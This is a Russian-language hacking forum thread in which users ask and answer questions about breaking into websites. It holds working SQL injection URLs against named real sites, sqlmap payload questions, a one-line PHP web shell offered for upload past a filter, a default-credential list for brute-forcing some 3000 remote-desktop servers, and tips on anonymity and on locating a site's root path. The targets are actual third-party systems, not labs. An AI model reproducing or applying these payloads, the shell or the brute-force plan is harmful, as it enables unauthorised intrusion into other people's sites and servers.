Ваши вопросы по уязвимостям.

Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode=allwords&SectionID=-1&Lang=_Ru

 

опять ничего(

 

Что можно сделать с этим: http://rp-gameworld.ru/index.php?c=registration&action=reg
или http://rp-gameworld.ru/?c=search

 

Host IP: 90.156.201.28
Web Server: Microsoft-IIS/8.0у
Powered-by: ASP.NET
Keyword Found: Не
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Finding columns count(MySQL,MsSQL 2005): 1

и всё ничего не находит.

 

Не через мозилу открывай.

 

а что на счет
http://aztexnika.az/uppload.php

http://aztexnika.az/admin/uppload.php

 

да уж

причем тут мозилла ?))

 

http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,(select/**/unhex(hex(table_name))/**/from/**/information_schema.tables/**/limit/**/0,1),4,5,6-- a&submit=Искать&mode=allwords&SectionID=-1&Lang=_Ru

 

здравствуйте.
вопрос в следующем. у меня интернет соединение 20кб/с. с таким интернетом дедик юзать не актуально ,как я понимаю(поправьте, если не прав). собственно вопрос, как обезопасить себя. виртуалка? торы? что сделать. простите, на форуме очень много воды, искать нужную информацию просто нет времени.

 

Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
Если Payload: '"%2bSLEEP(15)--
То --prefix=""%2b"
Так? если так то не идет всеравно

 

Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.

 

Я бы не просил объяснить если работало бы. Дело в том что и не получается.

 

как найти полный путь к корню сайта

 

phpinfo, ошибки php, подбор пути, исходя из параметров сервера

 

возможно ли провести иньекцыю в запросе

ошибка получается в запросе

дайте напутствие господа форумчане заранее благодарен

 

Да, надо только закончить логическую структуру запроса!

К примеру:
SELECT DISTINCT forum.title from forum AS
forum WHERE forumid IN (2) and 1=1 -- )

 

В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
Че делать?

 

попробуй залить

<?system($_GET[cmd])?> или passthru(), или exec() вместо system()
будет доступен:
shell.php?cmd=uname

 

Знаю, что вопрос немного не по теме, но подходящей я не нашёл.
Есть ли шанс сбрутить дедик с логинами

Code:

Administrator
admin

и пасами

Code:

administrator
admin
password
pass
p@ssword
passw0rd
p@ssw0rd
1
12
123
1234
12345
123456
0
00
000
0000
00000
support
123456

У меня 3000 ip-шников. Или словарь надо больше и я впустую потрачу время?

 

Вопрос все еще интересен, совет юзера выше не помог
выдает при таком коде вот что:

Code:

Warning: system() [function.system]: Cannot execute a blank command in тутпуть/wso2.php on line 1